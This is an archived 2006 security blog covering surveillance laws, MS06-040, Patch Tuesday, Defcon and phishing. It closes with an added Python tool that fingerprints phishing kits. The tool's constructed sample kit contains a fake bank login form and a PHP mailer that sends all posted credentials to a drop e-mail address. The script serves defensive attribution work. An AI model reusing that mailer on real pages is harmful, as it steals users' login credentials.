Tuesday, August 29, 2006

Big Brother Gone Mad?

The government knows exactly how much trash you throw out and of what type. This isn't some movie trick, this is the real world.

Electronic spy 'bugs' have been secretly planted in hundreds of thousands of household wheelie bins.

The gadgets - mostly installed by companies based in Germany - transmit information about the contents of the bins to a central database which then keeps records on the waste disposal habits of each individual address.

Already some 500,000 bins in council districts across England have been fitted with the bugs - with nearly all areas expected to follow suit within the next couple of years.

Until now, the majority of bins have been altered without the knowledge of their owners. In many cases, councils which ordered the installation of the devices did not even debate the proposals publicly.

The official reason for the bugs is to 'improve efficiency' and settle disputes between neighbours over wheelie-bin ownership. But experts say the technology is actually intended to enable councils to impose fines on householders who exceed limits on the amount of non-recyclable waste they put out. New powers for councils to do this are expected to be introduced by the Government shortly.

But the revelation that the bins have already been altered ignited a 'Bin Brother' row over privacy and taxes. Conservative MP Andrew Pelling said burglars could hack into the computer system to see if sudden reductions in waste at individual households meant the owners were on holiday and the property empty.

He said: 'This is nothing more than a spy in the bin and I don't think even the old Soviet Union made such an intrusion into people's personal lives.

'It is Big Brother gone mad. I think a more British way of doing things is to seek to persuade people rather than spy on them.'

Has Big Brother in the UK gone mad?

Part 3 of the RIP Act, cameras on every corner of the UK, traffic tickets based on camera time calculations, etc.

I am a firm believer in the balance. The government has a right and a duty to protect its people, but it is also the duty of the public to keep the government in check, which means the general public should want to be informed, should want to know what is going on, they should get involved as much as possible.

Monday, August 28, 2006

Emerging Shifts in Cyberwar Tactics

Via FCW.com -

Cyberwar is changing, and network defense must adapt, two leading executives told a military audience at the Air Force Information Technology Conference at Auburn University’s Montgomery campus earlier this month.

“We are at a much more dangerous place today than we were four or five years ago,” said Steve Ballmer, Microsoft’s chief executive officer. The perpetrators of cyberattacks have shifted in recent years from amateur hackers seeking notoriety to organized criminal enterprises with financial or hostile goals, he said.

John Thompson, Symantec’s CEO, said today’s cybercriminal is interested in “perpetrating silent, highly targeted attacks to steal sensitive personal, financial and operational information.” That new criminal tactic marks a shift away from large-scale virus or worm attacks. The number of such attacks dropped from about 100 between 2002 and 2004 to only six last year, he said.

Responses to cyberattacks are evolving, too, Ballmer said. In the past, experts worked to close vulnerabilities in programs and shorten release times for upgrades and patches. Now they focus on building systems that intruders cannot penetrate, he said.

That new defense strategy requires abandoning the suit-of-armor approach, in which developers added layers of protection to keep information safe.

Those layers restricted data access, hampering real-time use and mission performance, Thompson said. Effective cyberdefense will depend on a combination of protecting the IT infrastructure, information and interactions among people using the information, he added.

Standardized data formats and a common software infrastructure are crucial to IT infrastructure protection, Thompson said. Organizations must be sure to transfer data to backup systems to be ready for natural or man-made disasters. “After all, servers and laptop [computers] can be replaced. The information on them most likely cannot,” he said.

Disgruntled or careless employees can do significant damage, so organizations must monitor transactions to instantly combat suspicious or dangerous activity, Thompson said. For example, comply-and-connect mechanisms can verify user identity, he said. The proliferation of wireless devices and telework requires increasingly sophisticated approaches to certification and authentication, he added.

The next cyberwar battle will be fought over unstructured data, including e-mail messages, instant messages, Microsoft PowerPoint and Word documents, and voice-over-IP conversations, which compose 80 percent to 90 percent of data accessible via the Internet, Thompson said.

While I agree with Josh's conclusion that the tactics of cyberwar are changing, I do not agree that corporations or people should abandon the "defense in depth" idea. Perhaps I am reading too much into this sentence - "That new defense strategy requires abandoning the suit-of-armor approach, in which developers added layers of protection to keep information safe."

Corporations must remember that the cyberwar is not a "single-front" war. It has to be defended on multiple fronts at the same time. Investing in new cutting-edge hardware isn't enough, you must invest in your corporate "software" (aka your employees).

Sunday, August 27, 2006

A Day in Amsterdam

New PoC Virus Takes Aim @ AMD Processors

Via Computing.co.uk -

Security researchers at Symantec have discovered a new proof of concept virus that targets AMD processors rather than operating systems.

The worm comes in two versions, targeting 32-bit and 64-bit processors from AMD. Symantec refers to the online pests as w32.bounds and w64.bounds. Because it involves proof of concept code, both viruses are rated as low level threats.

Although at this point it concerns harmless proof of concept code, the virus could be used as a starting point for creating malware that affects computers regardless of the operating system that they run, cautioned Vincent Weafer, senior director of Symantec's Security Response Group.

It was only a matter of time.

Thursday, August 24, 2006

Tools of the Trade - Mini

Wireshark (formerly Ethereal) 0.99.3 has been released.

Some vulnerabilities have been reported in Wireshark, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.

  1. An unspecified error within the SCSI protocol dissector can be exploited to crash the application.
  2. Off-by-one errors exist in the IPSec ESP preference parser. Successful exploitation requires that Wireshark has been compiled with ESP decryption support.
  3. Errors in the DHCP dissector and potentially other protocol dissectors can be exploited to crash Wireshark due to a bug in Glib. This only affects the Windows version.
  4. An error within the Q.2931 dissector can be exploited to cause a DoS due to memory consumption.

Successful exploitation of the vulnerabilities may cause Wireshark to stop responding, consume large amounts of system memory, crash, or execute arbitrary code.

Full Secunia Advisory & Original Wireshark Advisory

This "Tools of the Trade" is very small due to my current location, but just wanted to share this one to everyone.

Wednesday, August 23, 2006

Nothing like the Smell of Internet Tubes in the Morning

Via blogs.ittoolbox.com -

If you use any number of popular web forums or even some commercial services like classmates.com, amazon.com, netzero.com or your provider's webmail service, you may not be aware that you're sending your credentials over the internet in the clear.

Some sites appear to secure your credentials, but they really don't. Some offer SSL sign-ins, but don't make them the default. Others don't even make an attempt to use proper SSL encryption or any attempt to obscure the credentials.

Remember the wall of sheep from DefCon? All of those people that kept logging into net resources assuming that nobody was listening? They were wrong!

Defcon's Wall of Sheep was full of Myspace passwords this year. Freaking crazy.

The above blog isn't pointing out anything new or "super-leet", but it is providing a much needed reminder to the security world. SSL can be very effective if used properly. Improper use and you create a false sense of security.

Check out Number 8 in the OWASP Top 10 Web Application Vulnerabilities.

Monday, August 21, 2006

Pluto Debate

I do not think Pluto or Xena should be planets or "plutons" or whatever. That's all I am going to say on that.

TheStar.com - Why Mississauga is a pluton

ASCO Report Recommends More Open Source for the DoD

The Department of Defense has a problem and the only cure is more "cowbell"....wait a tick, I mean more Open Source Software.

The Advanced Systems and Concepts Office (ASCO) recently released a report that recommends that the Department of Defense use and develop Open Source technologies.

The report was titled "Open Technology Development" and was prepared for Ms. Sue Payton, Deputy Under Secretary of Defense. (Full PDF).

It is good to see a group pushing the cultural shift that will be needed to use OSS in the government.

I also like to see the smart use of my tax money. ;)

Wednesday, August 16, 2006

Technocrat Goes to Europe

Well, I am off to Europe tomorrow. I will be in Paris most of the weekend and then will be working in London most of next week. For those readers in France and the UK, just yell at me if you want to meet for a pint. =)

Due to my traveling, blogging will be light for the next couple of weeks.

Fun: Bruce Schneier Facts

Dennis Henderson posted this on the FunSec mailing list this morning. Putting the fun back in Security.

This is just too funny not to share. I am sure we have all heard the Chuck Norris jokes...but here they are again with a tech angle. Good stuff, all in good fun of course.


I really liked these:

"Bruce Schneier was only allowed to view the Kryptos sculpture at Langley for 1 second, in order not to spoil the fun for other cryptographers. It was 0.9 seconds too much."

"The nuclear launch codes held by the President of the United States are secured by an unbreakable system: a plain brown envelope with a picture of Bruce Schneier on the flap. "

"Bruce Schneier's Twofish algorithm has 16 rounds, but he always gets a knockout in the first."

UK Home Office to Enable Part 3 of the RIP Act

"Give us your private encryption keys...your keys belong to us!"

Or at least that is what the UK government will be telling its citizens soon.

The UK's Home Office is seeking to turn on Part 3 of the Regulation of Investigatory Powers Act 2000 (RIP or RIPA) very soon.

Part 3 of the RIP Act gives the police powers to order the disclosure of encryption keys or force suspects to decrypt encrypted data.

Anyone who refuses to hand over a key to the police would face up to two years of imprisonment. Under current antiterrorism legislation, terrorist suspects now face up to five years for withholding keys.

Please note this part of a recent ZDNet article.

Caspar Bowden, a former director of the FIPR who led the fight against the introduction of the RIP Act several years ago, said during the meeting that Part 3 is flawed because defendants could be prosecuted for simply losing an encryption key.

"The burden of proof is on the suspect to prove that they don't have the key, and if they fail, they go to prison. But if they can give an explanation for not having the key, then the prosecution must prove beyond reasonable doubt that they are lying," Bowden said.

I understand why police want this power, but in my view...this is too wide and seems like it could be abused in a huge way by many groups of people.

Wikipedia shares this little piece of information as well.

In September 2003, Home Secretary David Blunkett announced wide-ranging extensions to the list of those entitled to see information collected under the RIPA. The list now includes jobcentres, local councils, and the Chief Inspector of Schools. Civil rights and privacy campaigners have dubbed these extensions a "snoopers' charter".

Here is the full text of the RIP Act of 2000.

Rickard Falkvinge, chairman of the Swedish Pirate Party, might have said it best in this WiredFire.org article about DarkNets.

"There are many legitimate reasons to want to be completely anonymous on the Internet" going on to add "If the government can check everything each citizen does, nobody can keep the government in check. The right to exchange information in private is fundamental to the democratic society. Without a safe and convenient way of accessing the Internet anonymously, this right is rendered null and void."

Sunday, August 13, 2006

Global MS06-040 Worm - Could it happen?

Sure it is very possible that the MS06-040 exploit could be used in a Sasser/MSBlast type of global worm...but I don't think it will happen. Why?

The LURHQ Threat Intelligence Group just released a great write-up on this exact issue and I see no reason to reinvent the wheel.

This makes it very clear that botnet owners will add this exploit into their bots....it would be silly on their part not to. This exploit could help them spread their botnets a bit more....but I don't see how they could get more than 5% or 10% growth, if even that much. LURHQ has already detected a Mocbot variant using MS06-040 to spread.

As LURHQ stated, machines with low service pack levels are most likely already owned by something or someone.

Let’s get down to the real issue however.

Why do holes like this exist in Windows?

It isn't because hackers find them…or because smart people make exploits for them....it is because Microsoft shipped a product with vulnerable code and we all ran out to the store and bought it. In essence, Microsoft put them there.

Hackers don’t inject buffer overflow or format string holes into code…they find what is already there. It would be easier for Microsoft to find these problems, since they have the source code…but it takes hackers looking around in binary code to find these issues, and then they are the ones to blame? Interesting view…

Word around the campfire is that Microsoft has taken account of its faults and is attempting to reduce these threats with Vista. Good to hear and kudos to Microsoft for one of the largest security audits ever (or so I hear).

Of course, these issues are not just Microsoft’s problem. Software firms that build and release software for public or corporate use encounter the same issue on a daily basis. So in the end, it is in the hands of the programmers at these companies.

I know some companies have yearly security training for the programming staff, but sadly many do not. Times change and new things are discovered…so no code will ever be perfect but it is the duty of these companies to protect their customers and therefore it just makes sense to keep their programmers on the cutting edge of security.

I went to a fairly small college, but rarely did I hear the word “security” in any of my programming classes. I never saw a class called “Secure Coding Practices” or “Building Secure Software for the Future”. So perhaps some of the fault falls to the education system and to the teachers…but I can only assume things have changed since I finished college almost 4 years ago.

Some things change...and some things always stay the same...

Saturday, August 12, 2006

Defcon 14: Best Spot the Fed Ever!

Ok, I heard about this one while at Defcon, but I didn't personally see it. Perhaps someone can personally account for this event, but it is still a great story. Either way. It has to be the best Spot the Fed ever.

Gadi Evron just posted the small event that happened up on stage. Here it is again...

Not exact quotes:

Priest: “So, what makes you suspect this guy is a fed?”
Girl: “I don’t suspect, I know.”
Priest: “How do you know?”
Girl: “Yesterday after I slept with him, I went through the things in his bag and found his badge.”
Priest: “Are you saying you slept with him last night?”
Girl: “Yes. Can I get my T-shirt now?”

I can add to this a bit. She roughly said that she met him, got drunk with him at the bar, slept with him and then while he was sleeping, she went through his things. Great story. lol

I think Priest said the guy was a Marine.


Friday, August 11, 2006

Dept of Transportation Laptop Stolen - 133,000 Identities

Via SecurityFocus -

A federal agent's stolen laptop in Florida has put 133,000 people's personal identities at risk.

In what is becoming a regular occurrence with U.S. government and military organizations, the laptop was stolen from a vehicle and contained sensitive personal information on individuals that was not encrypted in any way.

The Miami Herald is reporting the announcement by the federal U.S. Department of Transportation, which discovered the theft on July 27th. The department claims the data had been previously encrypted, but was not encrypted at the time the laptop was stolen. The data contains the names, addresses, birthdates and Social Security numbers of Florida citizens. A second laptop was stored in the vehicle but was not stolen, puzzling investigators.

Recent laptop thefts have affected a number of U.S. agencies, including the U.S. Navy and the high-profile theft at the U.S. Department of Veteran Affairs that contained the identities of 26.5 million veterans. Back in June, the U.S. government issued a memo mandating the use of encryption and two-factor authentication on civilian government computers containing sensitive information.

This is my favorite quote of the day - "The department [of Transportation] claims the data had been previously encrypted, but was not encrypted at the time the laptop was stolen."

Why even bring that fact up?

Thursday, August 10, 2006

MS06-040 Public Exploit - UPDATED

Metasploit has added an exploit for the buffer overflow vulnerability in the Microsoft Windows Server service (MS06-040).


This module exploits a stack overflow in the NetApi32 NetpIsRemote() function using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that other RPC calls could be used to exploit this service. This exploit will result in a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt will likely result in a complete reboot on Windows 2000 and the termination of all SMB-related services on Windows XP. The default target for this exploit should succeed on Windows NT 4.0, Windows 2000 SP0-SP4+, and Windows XP SP0-SP1.

US-CERT recommends users and administrators apply the appropriate updates in Microsoft Security Bulletin MS06-040 as soon as possible.

More information about this vulnerability can be found in Vulnerability Note VU#650769 and Technical Cyber Security Alert TA06-220A.

I have heard around the campfire that Core Impact has also released an MS06-040 exploit module to their customers.

eEye Digital Security has released Retina MS06-040 NetApi32 Scanner. It can be used to find machines on your network that are still open to attack.

You may remember eEye from the third-party WMF patch media event.

** UPDATE **

I have already spotted several hits on this blog from people that found me via a Blogger search of "MS06-040 exploits". Why are they looking? Who knows...but everyone should patch'em if you got'em.

UK and US Push for More Security Measures on Airplanes

Ok, this is getting a little silly, seriously. Here is the rundown.

Via News24 - Britain went on its highest alert for terrorist attacks early on Thursday after the discovery of a plot to blow up several planes flying between Britain and the United States.

The level of alert was raised to "critical" from "severe" as airport security was tightened.
British police earlier announced they had thwarted a major terrorist plot to allegedly blow up aircraft.

The plan was uncovered in a joint operation by Scotland Yard's anti-terrorist branch and security service, the Metropolitan Police said. British television said about 20 arrests had been made.

Sounds good, nice work Scotland Yard. But whoa, whoa...now the US is matching the new measures put in place by the UK on hand baggage.

Via ElectricNews - A British government statement said passengers would not be allowed to take on board any hand luggage except essential items in see-through bags. The U.S. Department of Homeland Security announced it was taking similar steps, including barring passengers from carrying liquids, including drinks, hair gel and lotions, on planes.

Are they serious? How about we fix whatever caused the TSA and TSA-like agencies to miss these serious security issues? I am a firm believer that everyone in the country should do their part to protect the country but when is the line reached?

I can only assume this plot has something to do with liquids....but what makes everyone in the world assume that what the terrorists attempt to do in the UK will be copied by those in the US?

I am pretty sure these terrorist groups are smart enough to run two different plots in two different nations against two different modes of transportation. But that is just my 2 cents.

So let's all go to the airport with a clear bag...makes me feel like I am a girl working at Dillard's in the local mall.

Wednesday, August 9, 2006

Wireless Device Driver Vulnerabilities

Ok, I have read several media write-ups about the speech given by Dave Maynor and "Johnny Cache" at Blackhat / Defcon and I have to say a couple of things.

Most of these articles are focusing WAY too much on the operating system used. Yes, it was running OS X.

Big deal, get over it. Who told everyone that Apple computers are totally secure and un-hackable? It wasn't me, that is for sure.

The truth is Apple computers have been hacked, rooted and used in botnets for some time now, this is pure fact. Like all computers/operating systems, Apple machines are open to attack given the correct conditions. Accept this statement or not, but this is the truth.

The speech was designed to point out very serious code problems in device drivers, which can lead to the complete compromise of the operating system since drivers normally run at SYSTEM / kernel level access.

Sure, it is flashy to use wireless device drivers to prove this point, but the real problem goes way beyond wireless. Attacking device drivers isn't a new idea in the security world, but it hasn't been taken very seriously by the media or the manufacturers until now.

So let's all stop making a point about which OS does that...or it wouldn't work on this because of blah, and let's all focus on the real issue.

Device drivers across all platforms have not been properly code audited and are a fresh new hacking ground.

Intel has released new wireless drivers recently, yet Apple seems to be working harder on keeping everyone quiet about the issue instead of fixing it.

Do OS X users really feel that Apple is keeping quiet to protect them? I don't see how. Apple is keeping everyone quiet to cover their bottom line...not the OS X faithful.

With all that being said, the video is quite amazing.

See the full media coverage at the SecureWorks website.

Tuesday, August 8, 2006

Black Tuesday - Microsoft Security Updates for Aug 2006

As part of Microsoft's routine, monthly security update cycle we released the following 12 security updates on August 8, 2006:

  • MS06-040 - Critical - Vulnerability in Server Service Could Allow Remote Code Execution
  • MS06-041 - Critical - Vulnerability in DNS Resolution Could Allow Remote Code Execution
  • MS06-042 - Critical - Cumulative Security Update for Internet Explorer
  • MS06-043 - Critical - Vulnerability in Microsoft Windows Could Allow Remote Code Execution
  • MS06-044 - Critical - Vulnerability in Microsoft Management Console Could Allow Remote Code Execution
  • MS06-045 - Important - Vulnerability in Windows Explorer Could Allow Remote Code Execution
  • MS06-046 - Critical - Vulnerability in HTML Help Could Allow Remote Code Execution
  • MS06-047 - Critical - Vulnerability in Microsoft Visual Basic for Applications Could Allow Remote Code Execution
  • MS06-048 - Critical - Vulnerabilities in Microsoft Office Could Allow Remote Code Execution
  • MS06-049 - Important - Vulnerability in Windows Kernel Could Result in Elevation of Privilege
  • MS06-050 - Important - Vulnerabilities in Microsoft Windows Hyperlink Object Library Could Allow Remote Code Execution
  • MS06-051 - Critical - Vulnerability in Windows Kernel Could Result in Remote Code Execution

Mad Props to Austin's Pedram Amini of the TippingPoint Security Research Team for reporting the Hyperlink Object Buffer Overflow Vulnerability - CVE-2006-3086.

Go get'em @ WindowsUpdate

Political Hacking News

Via Breitbart.com -

Democratic Sen. Joe Lieberman, who was locked in a battle with a political novice fueled by anti-war sentiment in the nation's most closely watched primary race Tuesday, accused his challenger's supporters of hacking his campaign Web site and e-mail system.

Lieberman campaign manager Sean Smith said the campaign has contacted the Connecticut attorney general's office and asked for a criminal investigation by state and federal authorities.

Via Kxan.com -

An Austin company is caught in the crossfire of the Mid-East war as Hezbollah's terror reaches Central Texas.

Broadwing Communications essentially threw Hezbollah off of the Internet this week. It came after the discovery that terror propaganda was linking to the company's network.

Interesting indeed....

Monday, August 7, 2006

Blackhat & Defcon in Photos

ZDI Party @ Body English

ZDI Party @ Body English

Microsoft Party @ Pool at the Palms

Microsoft AfterParty @ Rain

View from the Limo @ 4am

Entry @ Caesars Palace

Defcon Stuff

People @ a Defcon Speech

Wall of Sheep

CTF Results

Cute Roller-girl

How to "Bump" open locks...

SensePost releasing Suru and LR

Wednesday, August 2, 2006

Apple OSX Fetchmail Buffer Overflow

KF is at it again, reminding the public that security isn't just about which operating system you use.....

DMA[2006-0801a] - 'Apple OSX fetchmail buffer overflow'

Author: Kevin Finisterre


Product: 'Mac OSX <=10.4.7'


fetchmail-SA-2005-01 states that 'In fetchmail-6.2.5 and older, very long UIDs can cause fetchmail to crash, or potentially make it execute code placed on the stack. In some configurations, fetchmail is run by the root user to download mail for multiple accounts.' The authors of fetchmail made patches for these issues available to the public on 2005-07-21.

In defiance of a 'very proactive approach to security' Apple's OSX remained unpatched for approximately one year after the vendor supplied patches were made available. Shortly after the vendor disclosure of this bug exploits were made available by The Mantis Project (bannedit (at) frontiernet (dot) net). Coincidentally a recent paper was written about exploiting buffer overflows and this vulnerability was used as an example:

See the released exploit information here.

Yet another example of how OS X users can be vulnerable to attack because Apple doesn't patch its own use of open source software. It isn't the first time and I bet it won't be the last.

Tuesday, August 1, 2006

Blackhat & Defcon

Well, I am off to Vegas tomorrow...it is going to be a crazy week. If anyone wants to meet up for drinks...just let me know.

Interesting Quote: Sunshine

Recently Japan released its annual defense report, which featured both China and North Korea prominently. No surprises there really.

Foreign Ministry spokesman Tomohiko Taniguchi says openness from Beijing would help dispel concerns about China's military modernization. China has rapidly increased military spending in the past decade.

"Sunshine is the best disinfectant and you have to be very much transparent," he said. "The Defense Agency and the Foreign Ministry, as well, are requesting China reveal everything that is going on in terms of defense buildup and the amount of defense budget and what sort of equipment and weaponry the Chinese military is using."

Take Mr. Taniguchi's quote out of the military context and it is still very powerful.

"Sunshine is the best disinfectant..."

These five simple words say so much.

It can be compared to many other sayings about completely different subjects:
  • "Truth can set you free..."
  • "Knowing is half the battle..."
  • The Art of War by Sun Tzu - "So it is said that if you know your enemies and know yourself, you will not be imperiled in a hundred battles; if you do not know your enemies but do know yourself, you will win one and lose one; if you do not know your enemies nor yourself, you will be imperiled in every single battle."
  • The famous Linus's Law, "given enough eyeballs, all bugs are shallow"
  • The vulnerability full disclosure theory - details of a security vulnerability are disclosed to the public, including details of the vulnerability and how to detect and exploit it
  • etc, etc, etc

All of these are saying one thing.....Information is power.

So true. But this also means that misinformation is power....something to remember.

Scammers deploy Bots for eBay manipulation

Via Vnunet.com -

Scammers have turned to automated bots to create eBay accounts with a positive feedback record, reports security vendor Fortinet.

Online criminals use the automated scripts or bots to create vast collections of user accounts with positive feedback records. Those accounts can then be used to attract buyers by offering high value items that are never delivered after the bot-master criminals have received payments.

It was only a matter of time. Scammers and phishers have fine-tuned their social engineering skills in the last couple of years. Phishing sites are becoming more "real" as more and more of them use account checking scripts and IE toolbar spoofing.

They know what it takes to trick the normal person and usually don't take the time to trick the "good guys". Many times, I see comments in the phish page itself that tell me when and where they mirrored the site from. This is nice, since some of the phish are focused on local regional brands.

The backend control scripts normally contain any e-mail addresses used and perhaps their group name...

I always love to see comments like C:\Documents and Settings\Claude\update-phish.php in phishing sites...lol Way to go Claude! Nice work...
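The tells described above (a developer path left in a comment, the drop e-mail address sitting in the backend script, a mirroring tool's comment recording when and where the page was copied) are easy to pull out automatically once you have a copy of the kit. The script below is an added example written for this post, not code from the blog; the kit files it scans are constructed, the drop address and hostnames are made up, and the mirror-comment formats it recognises are the ones left by HTTrack and by Internet Explorer's "saved from url" mark, which are assumptions about what a given kit will contain.

```python
"""Pull operator fingerprints out of phishing-kit source files.

Added example for this post. The sample kit below is constructed; the
e-mail address, hostnames and timestamp in it are made up.
"""
import re

# Each pattern targets one kind of tell the post describes.
PATTERNS = {
    # Drop address in the backend mailer script (also catches addresses in comments).
    "email": re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+"),
    # HTTrack records the source host and the copy time in a leading comment.
    "mirror_httrack": re.compile(
        r"<!--\s*Mirrored from (\S+) by HTTrack[^\n]*?, "
        r"(\w{3}, \d{1,2} \w{3} \d{4} [\d:]+ GMT)\s*-->"
    ),
    # Internet Explorer "save page" leaves a mark-of-the-web with the origin URL.
    "mirror_ie": re.compile(r"<!--\s*saved from url=\(\d+\)(\S+)\s*-->", re.I),
    # Windows developer paths: directory names may contain spaces, the file name may not.
    "local_path": re.compile(r"[A-Za-z]:\\(?:[^\\<>\"'\n]+\\)*[^\\\s<>\"']+"),
    # Unix home-directory paths left behind in the same way.
    "nix_path": re.compile(r"/home/[\w.-]+/[^\s\"'<>]+"),
}


def fingerprint(source):
    """Return {category: sorted unique matches} for one page or script."""
    found = {}
    for name, pattern in PATTERNS.items():
        matches = pattern.findall(source)   # tuples when the pattern has several groups
        if matches:
            found[name] = sorted(set(matches))
    return found


def fingerprint_kit(files):
    """Merge findings across a whole kit given as {filename: contents}."""
    merged = {}
    for source in files.values():
        for name, values in fingerprint(source).items():
            merged.setdefault(name, set()).update(values)
    return {name: sorted(values) for name, values in merged.items()}


# Constructed two-file kit: a mirrored login page and the PHP mailer behind it.
SAMPLE_KIT = {
    "login.html": r"""<!-- Mirrored from www.bank.example/login by HTTrack Website Copier/3.x [XR&CO'2006], Tue, 29 Aug 2006 10:11:12 GMT -->
<html><body>
<form action="update-phish.php" method="post">
<input name="user"><input type="password" name="pass"></form>
</body></html>""",
    "update-phish.php": r"""<?php
// C:\Documents and Settings\Claude\update-phish.php
$to = "claude.drop@example.net";
$subject = "Rezult from " . $_SERVER['HTTP_HOST'];
mail($to, $subject, print_r($_POST, true));
header("Location: http://www.bank.example/login");
?>""",
}


if __name__ == "__main__":
    for name, values in fingerprint_kit(SAMPLE_KIT).items():
        print(name, values)
```

Run it over the files from a takedown or an archived kit and the merged output gives you the drop address to report, the source the page was cloned from, and the time it was cloned, which is the "when and where" the post is talking about.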